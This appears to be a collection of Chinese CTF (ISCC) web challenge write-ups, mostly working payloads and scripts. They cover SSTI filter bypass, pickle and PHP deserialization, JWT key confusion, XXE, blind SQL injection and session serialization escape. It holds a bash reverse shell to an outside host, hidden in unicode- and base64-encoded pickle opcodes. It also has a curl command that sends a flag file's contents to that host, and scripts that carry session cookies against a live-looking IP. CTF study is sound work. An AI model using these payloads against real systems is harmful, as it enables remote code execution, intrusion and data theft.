目录
由于做题比较匆忙所有题目均为文字描述,没有来得及截图
web ChatGGG.txt
1.输入flag
发现fllaaag.txt
2.网络响应发现服务端为WSGI
猜测有模板注入
3.测试过滤内容
{{}}不能用
使用{%print()%}
4.输入{%print(config)%}查看配置
5.构造payload
(1)+.*_ class base globals等一大部分都被过滤了
(2)~可以充当连接,使用""[""]代替.__
(3){%print(""["\x5f\x5fcla"~"ss\x5f\x5f"]["\x5F\x5Fba"~"se\x5F\x5F"]["\x5F\x5Fsubcla"~"sses\x5F\x5F"]()[233]["\x5F\x5Fin"~"it\x5F\x5F"]["\x5F\x5Fglo"~"bals\x5F\x5F"]["\x5F\x5Fbuil"~"tins\x5F\x5F"]["eval"]("\x5F\x5Fimpo"~"rt\x5F\x5F(\"os\")")["popen"]("cat flllaag\x2etxt|bas"~"e64")["read"]())%}
其中""["\x5f\x5fcla"~"ss\x5f\x5f"]=>""["__class__"]=>.__class__
web ISCC内部零元购-2.txt
方法一(非预期漏洞)
1.发现cookie里面是python反序列化
2.发现过滤了大部分内容,不过R指令没有过滤
3.手搓opcode(Vxxxx\nitimeit\ntimeit\nR.
4.xxxx即为替换执行代码,替换为__import__('os').system('bash -c "bash -i >& /dev/tcp/zua.tpddns.cn/1234 0<&1 2>&1"')
并且unicode编码即为
\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029
5.最终payload=b'''(V\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029\nitimeit\ntimeit\nR.'''
pickle.loads(payload)
测试通过
6.base64编码KFZcdTAwNWZcdTAwNWZcdTAwNjlcdTAwNmRcdTAwNzBcdTAwNmZcdTAwNzJcdTAwNzRcdTAwNWZcdTAwNWZcdTAwMjhcdTAwMjdcdTAwNmZcdTAwNzNcdTAwMjdcdTAwMjlcdTAwMmVcdTAwNzNcdTAwNzlcdTAwNzNcdTAwNzRcdTAwNjVcdTAwNmRcdTAwMjhcdTAwMjdcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjNcdTAwMjBcdTAwMjJcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjlcdTAwMjBcdTAwM2VcdTAwMjZcdTAwMjBcdTAwMmZcdTAwNjRcdTAwNjVcdTAwNzZcdTAwMmZcdTAwNzRcdTAwNjNcdTAwNzBcdTAwMmZcdTAwN2FcdTAwNzVcdTAwNjFcdTAwMmVcdTAwNzRcdTAwNzBcdTAwNjRcdTAwNjRcdTAwNmVcdTAwNzNcdTAwMmVcdTAwNjNcdTAwNmVcdTAwMmZcdTAwMzFcdTAwMzJcdTAwMzNcdTAwMzRcdTAwMjBcdTAwMzBcdTAwM2NcdTAwMjZcdTAwMzFcdTAwMjBcdTAwMzJcdTAwM2VcdTAwMjZcdTAwMzFcdTAwMjJcdTAwMjdcdTAwMjkKaXRpbWVpdAp0aW1laXQKUi4
替换cookie的session值即可反弹shell
cat flag.txt获取flag
方法二(预期解题思路)
SSTI模板注入
1.下载公钥文件
2.修改RS256为HS256,密钥混淆
import jwt
PUBLIC_KEY = open('key.txt').read()
payload = {
"name": "{{cycler.__init__.__globals__.os.popen('cat flag.txt').read()}}",
"exp": 9902085613, #失效时间,随便写就好
}
header = {
"Access_IP":"10.15.6.211",
"alg": "HS256",
"typ": "JWT",
}
encoded = jwt.encode(payload, PUBLIC_KEY, algorithm='HS256', headers=header)
print(encoded)
3.替换cookie中Auth值,并访问inner(内部商店)获取flag
#inner为第一题的内网地址
http://47.94.14.162:10009/iywqejdbcxnbamolxz238sdk
web ISCC单身节抽奖.txt
1.注册账号发现html源代码里面有一串base64编码
解码发现是PHP反序列化
2.密码设置为######";s:4:"sdog";i:1;s:8:"username";s:8:"#";}0
可以替换sdog的变量,是该用户成为单身狗
3.下载存根,跳转loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php,发现有checktime限制时间
4.尝试后发现科学计数法可以绕过,0.5e5
5.然后可以下载网站文件,尝试下载index.php,发现被加密了
6.跑字典,下载一个apidemo.php
<?php
// 一期未完工部分:xml查询接口apiR554CvL027POp0agxkQ1bBMXnH6Ad1rz.php
// <?xml
// version="1.0" encoding="utf-8"
// \?\>
// <user>
// <name>rocker</name>
// <isdog>singledog</isdog>
// <award>4090Ti</award>
?>
7.发现是一个xxe注入漏洞
8.payload
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><root><name>&xxe;</name></root>
web ISCC疯狂购物节-1.txt
1.寻找美羊羊的base64编码 576O576K576K
import requests
import time
import os
url="http://47.94.14.162:10001/more/get?page_number="
headers={
'Cookie': 'csrftoken=62jDmpFZNKoZOWg44yHc0wOYDIWM2Ha9xiiPpV5PuNcvmJEqBJqorQczHSr7oP7M; sessionid=riu577im8sbtirvkfq9415ov91te7h6z'
,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76'
,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
,
'Accept-Encoding': 'gzip, deflate'
,
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
,
'Cache-Control': 'max-age=0'
,
'Connection': 'keep-alive'
,
'Host': '47.94.14.162:10001'
,
'Referer': 'http:///47.94.14.162:10001/index/'
,
'Upgrade-Insecure-Requests': '1'
}
i=0
while i<126:
i+=1
try:
res=requests.get(url+str(i),headers=headers)
except:
pass
print(i,len(res.text))
#too fast
if len(res.text)==11:
time.sleep(0.5)
print(res.text)
if "576O576K576K" in res.text:
print(res.text)
if len(res.text)<1000:
i-=1
else:
#保存到文件方便查看
f=open('./1/'+str(i)+'.txt','w')
f.write(res.text)
f.close
2.发现fl4g,尝试该字段
import requests
import string
from time import sleep
# 绕过 are you kidding me
cookies ={
'csrftoken':
'Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31',
'sessionid': "q7kcs19owhq5nf42cln72dckwocgx3kd",
}
headers = {
'Acept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language' : 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests' : '1',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
}
def str_to_hex(string):
result = ''
for i in string:
result+=hex(ord(i))[2:]
return result
# 正则过滤了,只能 0x+四个字符
url = "http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23"
alphabet="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[\]^`{|}~"
result= 'ISCC{'
for i in range(1,100):
for ch in alphabet:
payload = url.format(str_to_hex(result[-1]),str_to_hex(ch))
print(payload)
r = requests.get(url=payload,cookies=cookies,headers=headers)
sleep(1.3)
if "too fast" in r.text:
print("too fast")
sleep(2)
r = requests.get(url=payload,cookies=cookies,headers=headers)
if"576O576K576K" in r.text:
print(payload)
result += ch
print("Success:", result)
break
爆完即可得到flag
web Where_is_your_love.txt
1.js解码发现3个文件
加密的letter.php,pem公钥,php反序列化
2.构造poc链
读取phpinfo
http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}
发现"love_story::love"无法设置this变量
使用$a = array("string" => [$l, "love"]);
class boy
{
public $like;
public function __destruct()
{
echo "能请你喝杯奶茶吗?
";
@$this->like->make_friends();
}
public function __toString()
{
echo "拱火大法好
";
return $this->like->string;
}
}
class girl
{
private $boyname;
public function __construct($a)
{
$this->boyname = $a;
}
public function __call($func, $args)
{
echo "我害羞羞
";
isset($this->boyname->name);
}
}
class helper
{
private $name; #{"string":"love_story::love"}
private $string;
public function __construct($a, $string)
{
if ($a === 1) {
$this->name = array('string' => '(new love_story())->love');
var_dump($this->name);
var_dump($this->name['string']);
} else {
$this->name = $a;
}
$this->string = $string;
}
public function __isset($val)
{
echo "僚机上线
";
echo $this->name;
}
public function __get($name)
{
echo "僚机不懈努力
";
$var = $this->$name;
var_dump($var);
var_dump($var[$name]);
$var[$name](); #(new love_story())->love()
}
}
class love_story
{
public $fall_in_love = array("girl_and_boy");
public function __construct()
{
echo "construct nihao";
}
public function love()
{
echo "爱情萌芽
";
array_walk($this, function ($make, $colo) {
echo "坠入爱河,给你爱的密码
";
if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
global $flag;
echo $flag;
echo "good";
}
});
}
}
getcwd();
$b1 = new boy();
$b2 = new boy();
$h1 = new helper($b2, "222");
$g = new girl($h1);
#$a["string"] = "love_story::love";
$l = new love_story();
$a = array("string" => [$l, "love"]);
$h2 = new helper(1, $a);
$b2->like = $h2;
$b1->like = $g;
echo urlencode(serialize($b1));
获取到e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404
3.写python解密rsa
从解密网站分解n得到p,q
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.PublicKey import RSA
import codecs
with open("keyiscc.pem", "rb") as f:
key = RSA.import_key(f.read())
print(f"n = {key.n}")
print(f"e = {key.e}")
n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603
e = 65537
p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967
q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709
with open('letter.php', 'rb') as f:
c = f.read()
c = int.from_bytes(c, byteorder='big')
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
flag = 'e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404'
flag1 = ''
for i in range(0, len(flag), 2):
cc = int(flag[i:i+2], 16)
b = cc ^ 100
a = chr(b - 10)
flag1 += a
print(codecs.decode(flag1[::-1], 'rot13'))
解密即可获取flag
web 上大号说话.txt
1.输入马保国
发现.git
python反序列化
2.发现cookie加密了
from cryptography.fernet import Fernet
import base64
import threading
def crypto(base_str):
return cipher_suite.encrypt(base_str)
def generate_key(key:str):
key_byte = key.encode()
#print(key_byte)
return base64.urlsafe_b64encode(key_byte + b'0' * 28)
def decode(t):
try:
print(cipher_suite.decrypt(t))
print("------------"+all+"-------------------")
except:
pass
num=0
all=''
for i in '5':
for j in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
for k in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
for z in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
all=i+j+k+z
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")
解密为5MbG
3.发现没有回显
使用公网ip监听
curl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`
尝试R指令被过滤
4.指令构造
b'\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`\nb.'
from cryptography.fernet import Fernet
import base64
import threading
def crypto(base_str):
return cipher_suite.encrypt(base_str)
def generate_key(key:str):
key_byte = key.encode()
#print(key_byte)
return base64.urlsafe_b64encode(key_byte + b'0' * 28)
def decode(t):
try:
print(cipher_suite.decrypt(t))
print("------------"+all+"-------------------")
exit()
except:
pass
num=0
all=''
#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
all="5MbG"
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
print(crypto( b'\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`\nb.'))
#decode(b"gAAAAABkbgX5ULO_yPmzK5cLusRWO9eeWW-5-MruKo3SMn29dxd4ymBY0IAt-3KJcHnYI5k7ZYIP9p8O59NoQf_o0pK8Zp-zJe5_h0-eNl86g8hsUmZakXP5d0u9QmwiViRQe8e0F_ORzxOoXnHPA4qlVySkCfeYcQCAUs8fXQZyRA6mwWgJklQ=")
加密gAAAAABkbgc2jXRhMnhB6ByRTx_31_oUchMP2wbrwyiLncydkyz8sycBHyPOY4zUlDJMdg0GLiwdh49tDzieZFl8GY01nZrLcnqAVf3_oAM2a8qBvjTFtb81xZsN9ZxJV5M3OcH1v78ItP4Alxg-VX74Py9kSLAtVtXmc87RX4dlLsNulmwiat1r5e3VoNfY9-jXcb1zruJfqyFs1ZE1KtWGW8JcTgLeww==
即可监听到base64编码的flag
web 小周的密码锁.txt
1.password2=5查看源码
2.写个py脚本碰撞sha1值
from hashlib import sha1
num=0
for s1 in ' #"%$&)(+*-,/.1234567890':
for s2 in ' #"%$&)(+*-,/.1234567890':
for s3 in ' #"%$&)(+*-,/.1234567890':
for s4 in ' #"%$&)(+*-,/.1234567890':
for s5 in ' #"%$&)(+*-,/.1234567890':
for s6 in ' #"%$&)(+*-,/.1234567890':
x=s1+s2+s3+s4+s5+s6
num+=1
if sha1(x.encode()).hexdigest()[-6:] == 'a05c53':
print(x)
if num%100000==0:
print(num)
#反向解析
from hashlib import sha1
num=0
for sha11 in 'abcdefghijklmnopqrstuvwsyz':
for sha2 in 'ABCDEFGHIJKLMNOPQRSTUVWSYZ':
sha=chr(ord(sha11)^ord(sha2));
if sha in ' (81&-':
print(sha11,sha2,sha)
最后找到aaaaaa和AIYPGL符合条件
3.写个php脚本绕过myhash
<?php
function MyHashCode($str)
{
$h = 0;
$len = strlen($str);
for ($i = 0; $i < $len; $i++) {
$hash = intval40(intval40(40 * $hash) + ord($str[$i]));
}
return abs($hash);
}
function intval40($code)
{
$falg = $code >> 32;
if ($falg == 1) {
$code = ~($code - 1);
return $code * -1;
} else {
return $code;
}
}
$a="abcdefghijklmnopqrstuvwxyz";
echo MyHashCode("ISCCNOTHARD");
for($i;$i<strlen($a);$i++) {
echo "<br>";
echo MyHashCode("IS".$a[$i]."CNOTHARD");
if(MyHashCode("IR".$a[$i]."CNOTHARD")===MyHashCode("ISCCNOTHARD")){
echo "IR".$a[$i]."CNOTHARD";
}
}
求出IRkCNOTHARD符合条件
//其中有个变量含有unicode控制字符,反向显示,原样复制下来就能用
构造payload
/?password=1&%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=AIYPGL&sha1=aaaaaa&username=A40481&password=IRkCNOTHARD
web 羊了个羊.txt
1.vue.global.js中找max
2.发现maxLevel为最大关卡
3.修改maxLevel为2即可拿到flag
##或者直接搜索alert
发现base64,解码
web 老狼老狼几点了.txt
1.burpsuite简单的跑一下time=0-60
2.发现time=12时显示源代码
3.思路是利用include()包含伪协议获取flag.php
4.发现filter对序列化后的内容进行过滤,接着又反序列化,这会破坏序列化字串的结构
构造内容_SESSION[base64base64]=000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.babase64se64-encode/resource=index.php";}
序列化后:a:3:{s:12:"base64base64";s:123:"000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.babase64se64-encode/resource=index.php";}";s:4:"file";s:8:"time.php";s:8:"function";s:9:"show_time";}
过滤后:a:3:{s:12:"";s:123:"000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.base64-encode/resource=index.php";}";s:4:"file";s:8:"time.php";s:8:"function";s:9:"show_time";}
这就拼接成一个新的序列化内容
5.最后md5碰撞,并提交上述内容
import requests
import time
s = requests.session()
def post1():
url1="http://47.94.14.162:10007/guess_time.php"
payload='sss";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:57:"php://filter/read=convert.babase64se64-encode/resource=flag.php";}'
f1=open("a.txt",'rb')
f2=open("b.txt",'rb')
data={"param1": f1.read(),
"param2": f2.read(),
"_SESSION[base64base64]":payload,
"_SESSION[file]":"time.php",
"_SESSION[function]":"hack"
}
# while True:
r = s.post(url1, data=data)
# if "PD" in r.text:
print(r.text)
while True:
post1()
time.sleep(0.5)
其中a.txt与b.txt用fastcool生产与unix时间戳md5相同的两个文件,并且开头内容是unix时间戳
6.时间延后一点,即可成功碰撞